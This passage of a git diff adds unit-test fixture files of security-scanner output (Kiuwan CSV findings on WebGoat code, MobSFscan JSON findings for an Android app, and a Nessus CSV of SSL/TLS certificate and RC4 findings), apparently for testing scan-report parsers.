management,Java,06m,http-only/src/main/java/org/owasp/webgoat/plugin/HttpOnly.java,503, for (int i = 0; i < s.length(); i++),http-only/src/main/java/org/owasp/webgoat/plugin/HttpOnly.java,446,"browser = s.getHeader(""user-agent"").toLowerCase()",No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,http-only/src/main/java/org/owasp/webgoat/plugin/HttpOnly.java,503, for (int i = 0; i < s.length(); i++),http-only/src/main/java/org/owasp/webgoat/plugin/HttpOnly.java,446,"browser = s.getHeader(""user-agent"").toLowerCase()",No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,sql-numeric-injection/src/main/java/org/owasp/webgoat/plugin/SqlNumericInjection.java,235,key = (String) it.next(),webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,229, Screen screen = (Screen) lessonIter.next();,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,89,user = s.getUserName();,No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,229, Screen screen = (Screen) lessonIter.next();,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java,77,e = s.getParser().getParameterNames(),No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,240, Screen screen = (Screen) lessonIter.next();,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,89,user = s.getUserName();,No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,240, Screen screen = (Screen) lessonIter.next();,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java,77,e = s.getParser().getParameterNames(),No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,251, Screen screen = (Screen) lessonIter.next();,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,89,user = s.getUserName();,No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ReportCardScreen.java,251, Screen screen = (Screen) lessonIter.next();,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java,77,e = s.getParser().getParameterNames(),No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/session/Course.java,256," lessonList.addAll(getLessons(s, (Category) categoryIter.next(), roles));",webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java,67,HttpSession session,No,CWE:606,none,CWEScope:Availability, \ No newline at end of file diff --git a/unittests/scans/kiuwan_sample/kiuwan_no_vuln.csv b/unittests/scans/kiuwan_sample/kiuwan_no_vuln.csv new file mode 100644 index 00000000000..a5ac7b43c3e --- /dev/null +++ b/unittests/scans/kiuwan_sample/kiuwan_no_vuln.csv @@ -0,0 +1 @@ +Rule code,Rule,Priority,CWE,Software characteristic,Vulnerability type,Language,Effort,File,Line number,Line text,Source file,Source line number,Source line text,Muted,Normative,Status,CWE Scope,Framework \ No newline at end of file diff --git a/unittests/scans/kiuwan_sample/kiuwan_two_vuln.csv b/unittests/scans/kiuwan_sample/kiuwan_two_vuln.csv new file mode 100644 index 00000000000..df42cd2eac8 --- /dev/null +++ b/unittests/scans/kiuwan_sample/kiuwan_two_vuln.csv @@ -0,0 +1,3 @@ +Rule code,Rule,Priority,CWE,Software characteristic,Vulnerability type,Language,Effort,File,Line number,Line text,Source file,Source line number,Source line text,Muted,Normative,Status,CWE Scope,Framework +OPT.JAVA.SEC_JAVA.XPathInjectionRule,Improper Neutralization of Data within XPath Expressions ('XPath Injection'),Very High,643,Security,Injection,Java,30m,xpath-injection/src/main/java/org/owasp/webgoat/plugin/XPATHInjection.java,144,"nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);",xpath-injection/src/main/java/org/owasp/webgoat/plugin/XPATHInjection.java,130,"password = s.getParser().getRawParameter(PASSWORD, """")",No,"CERT-J:IDS53-J,CWE:643,OWASP:2013:A1,OWASP:2013:A5,PCI-DSS:6.5.1,WASC:39",none,"CWEScope:Access-Control,CWEScope:Confidentiality", +OPT.JAVA.SEC_JAVA.XmlEntityInjectionRule,XML entity injection,Very High,611,Security,Injection,Java,30m,ws-sax-injection/src/main/java/org/owasp/webgoat/plugin/WsSAXInjection.java,164,reader.parse(new InputSource(new StringReader(xml)));,ws-sax-injection/src/main/java/org/owasp/webgoat/plugin/WsSAXInjection.java,157,String xml,No,"CERT-J:IDS16-J,CERT-J:IDS17-J,CWE:611,CWE:776,OWASP:2013:A1,OWASP:2013:A5,OWASP:2017:A4,PCI-DSS:6.5.1,WASC:43,WASC:44",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity" \ No newline at end of file diff --git a/unittests/scans/mobsfscan/many_findings.json b/unittests/scans/mobsfscan/many_findings.json new file mode 100644 index 00000000000..5e38baf88de --- /dev/null +++ b/unittests/scans/mobsfscan/many_findings.json @@ -0,0 +1,90 @@ +{ + "errors": [], + "mobsfscan_version": "0.0.6", + "results": { + "android_certificate_transparency": { + "metadata": { + "cwe": "CWE-295 Improper Certificate Validation", + "description": "This app does not enforce TLS Certificate Transparency which helps to detect SSL certificates that have been mistakenly issued by a certificate authority or maliciously acquired from an otherwise unimpeachable certificate authority.", + "masvs": "MSTG-NETWORK-4", + "owasp-mobile": "M3: Insecure Communication", + "reference": "https://github.com/MobSF/owasp-mstg/blob/master/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4", + "severity": "INFO" + } + }, + "android_kotlin_hardcoded": { + "files": [ + { + "file_path": "app/src/main/java/com/routes/domain/analytics/event/Signatures.kt", + "match_lines": [ + 10, + 10 + ], + "match_position": [ + 243, + 271 + ], + "match_string": "key = \"hmi_busroutes_health\"" + } + ], + "metadata": { + "cwe": "CWE-798 Use of Hard-coded Credentials", + "description": "Files may contain hardcoded sensitive information like usernames, passwords, keys etc.", + "masvs": "MSTG-STORAGE-14", + "owasp-mobile": "M9: Reverse Engineering", + "reference": "https://github.com/MobSF/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#storing-a-key---example", + "severity": "WARNING" + } + }, + "android_prevent_screenshot": { + "metadata": { + "cwe": "CWE-200 Information Exposure", + "description": "This app does not have capabilities to prevent against Screenshots from Recent Task History/ Now On Tap etc.", + "masvs": "MSTG-STORAGE-9", + "owasp-mobile": "M2: Insecure Data Storage", + "reference": "https://github.com/MobSF/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9", + "severity": "INFO" + } + }, + "android_root_detection": { + "metadata": { + "cwe": "CWE-919 - Weaknesses in Mobile Applications", + "description": "This app does not have root detection capabilities. Running a sensitive application on a rooted device questions the device integrity and affects users data.", + "masvs": "MSTG-RESILIENCE-1", + "owasp-mobile": "M8: Code Tampering", + "reference": "https://github.com/MobSF/owasp-mstg/blob/master/Document/0x05j-Testing-Resiliency-Against-Reverse-Engineering.md#testing-root-detection-mstg-resilience-1", + "severity": "INFO" + } + }, + "android_safetynet": { + "metadata": { + "cwe": "CWE-353 Missing Support for Integrity Check", + "description": "This app does not uses SafetyNet Attestation API that provides cryptographically-signed attestation, assessing the device's integrity. This check helps to ensure that the servers are interacting with the genuine app running on a genuine Android device. ", + "masvs": "MSTG-RESILIENCE-1", + "owasp-mobile": "M8: Code Tampering", + "reference": "https://github.com/MobSF/owasp-mstg/blob/master/Document/0x05j-Testing-Resiliency-Against-Reverse-Engineering.md#testing-root-detection-mstg-resilience-1", + "severity": "INFO" + } + }, + "android_ssl_pinning": { + "metadata": { + "cwe": "CWE-295 Improper Certificate Validation", + "description": "This app does not use TLS/SSL certificate or public key pinning to detect or prevent MITM attacks in secure communication channel.", + "masvs": "MSTG-NETWORK-4", + "owasp-mobile": "M3: Insecure Communication", + "reference": "https://github.com/MobSF/owasp-mstg/blob/master/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4", + "severity": "INFO" + } + }, + "android_tapjacking": { + "metadata": { + "cwe": "CWE-200 Information Exposure", + "description": "This app does not have capabilities to prevent tapjacking attacks.", + "masvs": "MSTG-PLATFORM-9", + "owasp-mobile": "M1: Improper Platform Usage", + "reference": "https://github.com/MobSF/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#testing-for-overlay-attacks-mstg-platform-9", + "severity": "INFO" + } + } + } +} \ No newline at end of file diff --git a/unittests/scans/mobsfscan/no_findings.json b/unittests/scans/mobsfscan/no_findings.json new file mode 100644 index 00000000000..28dbe9e3a07 --- /dev/null +++ b/unittests/scans/mobsfscan/no_findings.json @@ -0,0 +1,5 @@ +{ + "errors": [], + "mobsfscan_version": "0.0.6", + "results": {} +} diff --git a/unittests/scans/nessus/nessus_many_vuln.csv b/unittests/scans/nessus/nessus_many_vuln.csv new file mode 100644 index 00000000000..530342c49d1 --- /dev/null +++ b/unittests/scans/nessus/nessus_many_vuln.csv @@ -0,0 +1,574 @@ +Plugin,Plugin Name,Family,Severity,IP Address,Protocol,Port,Exploit?,Repository,MAC Address,DNS Name,NetBIOS Name,Plugin Text,First Discovered,Last Observed,Exploit Frameworks,Synopsis,Description,Solution,See Also,Risk Factor,STIG Severity,Vulnerability Priority Rating,CVSS V2 Base Score,CVSS V3 Base Score,CVSS V2 Temporal Score,CVSS V3 Temporal Score,CVSS V2 Vector,CVSS V3 Vector,CPE,CVE,BID,Cross References,Vuln Publication Date,Patch Publication Date,Plugin Publication Date,Plugin Modification Date,Exploit Ease,Check Type,Version +35291,SSL Certificate Signed Using Weak Hashing Algorithm,General,Medium,10.1.1.1,TCP,443,Yes,Individual Scan,,,,"Plugin Output: +The following certificates were part of the certificate chain sent by +the remote host, but contain hashes that are considered to be weak.","Jan 5, 2021 10:24:08 MST","Jan 5, 2021 10:24:08 MST",,An SSL certificate in the certificate chain has been signed using a weak hash algorithm.,"The remote service uses an SSL certificate chain that has been signed using a cryptographically weak hashing algorithm (e.g. MD2, MD4, MD5, or SHA1). These signature algorithms are known to be vulnerable to collision attacks. An attacker can exploit this to generate another certificate with the same digital signature, allowing an attacker to masquerade as the affected service. + +Note that this plugin reports all SSL certificate chains signed with SHA-1 that expire after January 1, 2017 as vulnerable. This is in accordance with Google's gradual sunsetting of the SHA-1 cryptographic hash algorithm. + +Note that certificates in the chain that are contained in the Nessus CA database (known_CA.inc) have been ignored.",Contact the Certificate Authority to have the SSL certificate reissued.,"https://tools.ietf.org/html/rfc3279 +http://www.nessus.org/u?9bb87bf2 +http://www.nessus.org/u?e120eea1 +http://www.nessus.org/u?5d894816 +http://www.nessus.org/u?51db68aa +http://www.nessus.org/u?9dc7bfba",Medium,,4.4,5,7.5,3.9,6.7,AV:N/AC:L/Au:N/C:N/I:P/A:N/E:POC/RL:OF/RC:C,AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C,"cpe:/a:ietf:md5 +cpe:/a:ietf:x.509_certificate",CVE-2004-2761,"1,184,933,065","CERT #836068,CWE #310","Aug 18, 2004 12:00:00 MDT",N/A,"Jan 5, 2009 12:00:00 MST","Apr 27, 2020 12:00:00 MDT",Exploits are available,remote,1.31 +51192,SSL Certificate Cannot Be Trusted,General,Medium,10.1.1.1,TCP,443,No,Individual Scan,,,,"Plugin Output: +The following certificate was at the top of the certificate +chain sent by the remote host, but it is signed by an unknown +certificate authority : +","Jan 5, 2021 10:24:08 MST","Jan 5, 2021 10:24:08 MST",,The SSL certificate for this service cannot be trusted.,"The server's X.509 certificate cannot be trusted. This situation can occur in three different ways, in which the chain of trust can be broken, as stated below : + + - First, the top of the certificate chain sent by the server might not be descended from a known public certificate authority. This can occur either when the top of the chain is an unrecognized, self-signed certificate, or when intermediate certificates are missing that would connect the top of the certificate chain to a known public certificate authority. + + - Second, the certificate chain may contain a certificate that is not valid at the time of the scan. This can occur either when the scan occurs before one of the certificate's 'notBefore' dates, or after one of the certificate's 'notAfter' dates. + + - Third, the certificate chain may contain a signature that either didn't match the certificate's information or could not be verified. Bad signatures can be fixed by getting the certificate with the bad signature to be re-signed by its issuer. Signatures that could not be verified are the result of the certificate's issuer using a signing algorithm that Nessus either does not support or does not recognize. + +If the remote host is a public host in production, any break in the chain makes it more difficult for users to verify the authenticity and identity of the web server. This could make it easier to carry out man-in-the-middle attacks against the remote host.",Purchase or generate a proper SSL certificate for this service.,"https://www.itu.int/rec/T-REC-X.509/en +https://en.wikipedia.org/wiki/X.509",Medium,,,6.4,6.5,,,AV:N/AC:L/Au:N/C:P/I:P/A:N,AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N,,,,,N/A,N/A,"Dec 15, 2010 12:00:00 MST","Apr 27, 2020 12:00:00 MDT",,remote,1.19 +57582,SSL Self-Signed Certificate,General,Medium,10.2.1.1,TCP,443,No,Individual Scan,,,,"Plugin Output: +The following certificate was found at the top of the certificate +chain sent by the remote host, but is self-signed and was not +found in the list of known certificate authorities : +","Jan 5, 2021 10:24:08 MST","Jan 5, 2021 10:24:08 MST",,The SSL certificate chain for this service ends in an unrecognized self-signed certificate.,"The X.509 certificate chain for this service is not signed by a recognized certificate authority. If the remote host is a public host in production, this nullifies the use of SSL as anyone could establish a man-in-the-middle attack against the remote host. + +Note that this plugin does not check for certificate chains that end in a certificate that is not self-signed, but is signed by an unrecognized certificate authority.",Purchase or generate a proper SSL certificate for this service.,,Medium,,,6.4,,,,AV:N/AC:L/Au:N/C:P/I:P/A:N,,,,,,N/A,N/A,"Jan 17, 2012 12:00:00 MST","Apr 27, 2020 12:00:00 MDT",,remote,1.5 +65821,SSL RC4 Cipher Suites Supported (Bar Mitzvah),General,Medium,10.2.1.1,TCP,443,No,Individual Scan,,,,"Plugin Output: +List of RC4 cipher suites supported by the remote server : +","Jan 5, 2021 10:24:08 MST","Jan 5, 2021 10:24:08 MST",,The remote service supports the use of the RC4 cipher.,"The remote host supports the use of RC4 in one or more cipher suites. +The RC4 cipher is flawed in its generation of a pseudo-random stream of bytes so that a wide variety of small biases are introduced into the stream, decreasing its randomness. + +If plaintext is repeatedly encrypted (e.g., HTTP cookies), and an attacker is able to obtain many (i.e., tens of millions) ciphertexts, the attacker may be able to derive the plaintext.","Reconfigure the affected application, if possible, to avoid use of RC4 ciphers. Consider using TLS 1.2 with AES-GCM suites subject to browser and web server support.","https://www.rc4nomore.com/ +http://www.nessus.org/u?ac7327a0 +http://cr.yp.to/talks/2013.03.12/slides.pdf +http://www.isg.rhul.ac.uk/tls/ +https://www.imperva.com/docs/HII_Attacking_SSL_when_using_RC4.pdf",Medium,,5.1,4.3,5.9,3.7,5.4,AV:N/AC:M/Au:N/C:P/I:N/A:N/E:U/RL:ND/RC:C,AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:X/RC:C,,"CVE-2013-2566,CVE-2015-2808","5,879,673,684",,"Mar 12, 2013 12:00:00 MDT",N/A,"Apr 5, 2013 12:00:00 MDT","Feb 27, 2020 12:00:00 MST",No known exploits are available,remote,1.2 +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 